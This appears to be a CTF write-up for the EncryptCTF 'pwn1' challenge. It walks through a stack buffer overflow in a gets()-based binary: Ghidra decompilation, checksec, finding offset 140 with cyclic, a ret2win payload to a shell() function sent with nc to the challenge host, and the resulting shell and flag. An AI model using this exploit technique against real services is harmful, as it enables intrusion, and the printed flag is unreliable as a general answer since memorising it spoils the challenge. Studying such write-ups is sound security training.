Writeups

View on GitHub

PWN 1

Category : Pwning/Binary Exploitaition

As usual we are given a binary to exploit.

Let’s decompile it in Ghidra

undefined4 main(void)

{
  char local_90 [140];
  
  setvbuf(stdout,(char *)0x0,2,0);
  printf("Tell me your name: ");
  gets(local_90);
  printf("Hello, %s\n",local_90);
  return 0;
}

A simple buffer overflow.

Let’s checksec it

checksec pwn1 
[*] '/home/vipul/Desktop/EncryptCTF/pwn1_SOLVED/pwn1'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

SInce NX is enabled, we can’t inject shellcode. But we don’t have to. We are given a function that calls the shell for us

void shell(void)

{
  system("/bin/bash");
  return;
}

2 Steps of Buffer Overflow

1) Find the Offset to overflow 2) Find the location of the function to call

For step 1

Using pwntools cyclic(n) function we get break it, and then using cyclic_find(n) we get the offset.

Reading symbols from ./pwn1...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /home/vipul/Desktop/EncryptCTF/pwn1_SOLVED/pwn1 
Tell me your name: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
Hello, aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

Program received signal SIGSEGV, Segmentation fault.


[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffffff 
EDX: 0xf7fac890 --> 0x0 
ESI: 0xf7fab000 --> 0x1dcd6c 
EDI: 0xf7fab000 --> 0x1dcd6c 
EBP: 0x6261616a ('jaab')
ESP: 0xffffd480 ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
EIP: 0x6261616b ('kaab')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x6261616b
[------------------------------------stack-------------------------------------]
0000| 0xffffd480 ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0004| 0xffffd484 ("maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0008| 0xffffd488 ("naaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0012| 0xffffd48c ("oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0016| 0xffffd490 ("paabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0020| 0xffffd494 ("qaabraabsaabtaabuaabvaabwaabxaabyaab")
0024| 0xffffd498 ("raabsaabtaabuaabvaabwaabxaabyaab")
0028| 0xffffd49c ("saabtaabuaabvaabwaabxaabyaab")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x6261616b in ?? ()
>>> from pwn import *
>>> cyclic(200)
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
>>> cyclic_find(0x6261616b)
140

We have the offset 140. For the shell function

gdb-peda$ info address shell
Symbol "shell" is at 0x80484ad in a file compiled without debugging.

The exploit

vipul@ubuntu:~$ python -c "from pwn import *; print('A'*140 +p32(0x80484ad))" > exploit
vipul@ubuntu:~$ cat exploit - | nc 104.154.106.182 2345
Tell me your name: Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��
whoami
pwn1
ls
flag.txt
pwn1
cat flag.txt
encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}